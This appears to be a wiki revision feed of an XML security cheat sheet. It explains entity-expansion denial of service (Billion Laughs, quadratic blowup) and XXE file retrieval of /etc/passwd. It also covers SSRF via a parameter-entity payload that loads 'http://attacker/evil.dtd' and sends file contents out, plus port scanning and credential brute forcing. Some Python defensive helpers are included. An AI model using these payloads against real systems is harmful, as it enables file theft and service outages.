The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like https://example.com/note.dtd. In a normal scenario, example.com resolves to the IP address 1.1.1.1:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 1.1.1.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 2.2.2.2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may actually be retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; references another entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is in turn defined in terms of entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, the schema describes a circular reference between entities:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;A&amp;gt;&amp;amp;A;&amp;lt;/A&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
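&lt;br /&gt;
The XML specification forbids an entity from referring to itself directly or indirectly, so a conforming parser should reject such a document. The following Python sketch shows one way a circular reference could be detected; it assumes the entity definitions were already reduced to a mapping from each entity name to the names it references, and &amp;lt;tt&amp;gt;find_entity_cycle&amp;lt;/tt&amp;gt; is a hypothetical name:&lt;br /&gt;

```python
def find_entity_cycle(references):
    """Return one cycle of entity names as a list, or None if there is none.

    references maps each entity name to the names its definition refers to.
    """
    finished = set()

    def visit(name, path):
        if name in path:
            # This entity is already being expanded: circular reference.
            return path[path.index(name):] + [name]
        if name in finished:
            return None
        for target in references.get(name, ()):
            cycle = visit(target, path + [name])
            if cycle:
                return cycle
        finished.add(name)
        return None

    for name in references:
        cycle = visit(name, [])
        if cycle:
            return cycle
    return None


# The DTD above reduces to A referencing B and B referencing A:
# find_entity_cycle({"A": ["B"], "B": ["A"]}) returns ["A", "B", "A"]
```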
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n^2)). The result of the following attack will be 100,000*100,000 (10^10) characters in memory.&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(a 100.000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(a 100.000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the nested entities defined in the following document, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
 &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;LOL9;&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as the 10 references to &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt; it contains; each of these will in turn be resolved as 10 references to &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt;, and so on. Finally, the CPU and/or memory will be affected by expanding the resulting 10^9 copies of &amp;lt;tt&amp;gt;LOL&amp;lt;/tt&amp;gt; (3*10^9, or 3,000,000,000, characters), which could make the parser crash.&lt;br /&gt;
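&lt;br /&gt;
The size of an expansion can be estimated without performing it. The following Python sketch computes the expanded length for both this attack and the quadratic blowup; the data layout and the name &amp;lt;tt&amp;gt;expanded_length&amp;lt;/tt&amp;gt; are assumptions made for illustration, and the entities are assumed to contain no circular references:&lt;br /&gt;

```python
from functools import lru_cache


def expanded_length(entities, name):
    """Length in characters of the entity called name once fully expanded.

    entities maps a name to (literal_length, references), where references
    maps each referenced entity name to how many times it is referenced.
    """

    @lru_cache(maxsize=None)
    def length(current):
        literal_length, references = entities[current]
        return literal_length + sum(
            count * length(target) for target, count in references.items()
        )

    return length(name)


# Billion Laughs: LOL is 3 characters; each level refers to the previous one 10 times.
billion_laughs = {"LOL": (3, {})}
for level in range(1, 10):
    previous = "LOL" if level == 1 else "LOL%d" % (level - 1)
    billion_laughs["LOL%d" % level] = (0, {previous: 10})

# Quadratic Blowup: one entity of 100,000 characters referenced 100,000 times.
quadratic = {"A": (100_000, {}), "root": (0, {"A": 100_000})}

# expanded_length(billion_laughs, "LOL9") returns 3000000000
# expanded_length(quadratic, "root") returns 10000000000
```

A parser could compare such an estimate against a fixed budget and refuse the document before allocating any memory for the expansion.&lt;br /&gt;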
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE SOAP-ENV:Envelope [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:Envelope ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:Envelope ENTITYREFERENCE CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt; &lt;br /&gt;
&amp;lt;SOAP:Envelope ENTITYREFERENCE=&amp;quot;&amp;amp;LOL9;&amp;quot; xmlns:SOAP=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;SOAP:Body&amp;gt; &lt;br /&gt;
    &amp;lt;KEYWORD xmlns=&amp;quot;URN:PARASOFT:WS:STORE&amp;quot;&amp;gt;FOO&amp;lt;/KEYWORD&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:Body&amp;gt;&lt;br /&gt;
&amp;lt;/SOAP:Envelope&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY xxe SYSTEM &amp;quot;/etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;xxe;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an external entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt; whose replacement text is the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;; the entity is expanded within the &amp;lt;tt&amp;gt;root&amp;lt;/tt&amp;gt; element. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output.&lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF) happens when the server receives a malicious XML schema that makes the server retrieve remote resources, such as a file over HTTP, HTTPS, or FTP. SSRF has been used to retrieve remote files, to prove an XXE when the file cannot be reflected back, to perform port scanning, and to perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY % xxe SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt; &lt;br /&gt;
  %xxe;&lt;br /&gt;
]&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allow for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % file SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % dtd SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %dtd;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;send;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt;, which loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt;, which loads a remote DTD. The remote DTD should contain something like this:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY % all &amp;quot;&amp;lt;!ENTITY send SYSTEM 'http://example.com/?%file;'&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
%all;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL. &lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
This is the simplest and most unusual scenario. With complete disclosure, you can clearly see what is going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the response time when connecting to an open port will be very quick (one second, for example). The differences between open and closed ports become quite clear.&lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host, then analyze the average time for each port to determine its status. This type of attack will be difficult to accomplish when performed in higher latency networks.&lt;br /&gt;
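&lt;br /&gt;
The averaging step can be sketched in a few lines of Python. The function name &amp;lt;tt&amp;gt;classify_ports&amp;lt;/tt&amp;gt;, the threshold, and the assumption that slower responses indicate a closed port are all illustrative; which side of the threshold means open depends on the implementation being tested:&lt;br /&gt;

```python
from statistics import mean


def classify_ports(timings, threshold_seconds):
    """Label each port by comparing its mean response time with a threshold.

    timings maps a port number to a list of measured response times in seconds.
    Slower responses are labeled "closed" here purely as an assumption.
    """
    return {
        port: "closed" if mean(samples) > threshold_seconds else "open"
        for port, samples in timings.items()
    }
```

Taking several samples per port reduces the effect of a single slow response, which is why the measurements are averaged before they are compared.&lt;br /&gt;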
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; as part of the URI. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
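&lt;br /&gt;
An application that resolves external references could refuse any URI that carries credentials. The following Python sketch uses the standard library URL parser for that purpose; &amp;lt;tt&amp;gt;has_embedded_credentials&amp;lt;/tt&amp;gt; is a hypothetical helper name:&lt;br /&gt;

```python
from urllib.parse import urlsplit


def has_embedded_credentials(uri):
    """Return True when the URI carries a username or password component."""
    parts = urlsplit(uri)
    return parts.username is not None or parts.password is not None


# has_embedded_credentials("foo://username:password@example.com:8080/") returns True
```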
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224432</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224432"/>
				<updated>2016-12-21T20:20:00Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using documents that are not well formed.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution upon detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though it is not required:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coercive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up —and eventually deplete— the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
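&lt;br /&gt;
The integrity check could be as simple as comparing the schema file against a digest recorded when the schema was reviewed. The following Python sketch assumes SHA-256 and a pinned hexadecimal digest stored alongside the application; the function name &amp;lt;tt&amp;gt;schema_matches_digest&amp;lt;/tt&amp;gt; is hypothetical:&lt;br /&gt;

```python
import hashlib
import hmac


def schema_matches_digest(schema_bytes, expected_sha256_hex):
    """Return True if the schema content hashes to the pinned SHA-256 digest."""
    actual = hashlib.sha256(schema_bytes).hexdigest()
    # compare_digest avoids leaking how many leading characters matched.
    return hmac.compare_digest(actual, expected_sha256_hex.lower())
```

A schema that fails the comparison should not be used for validation, whether it was loaded from a local copy or from a repository.&lt;br /&gt;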
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
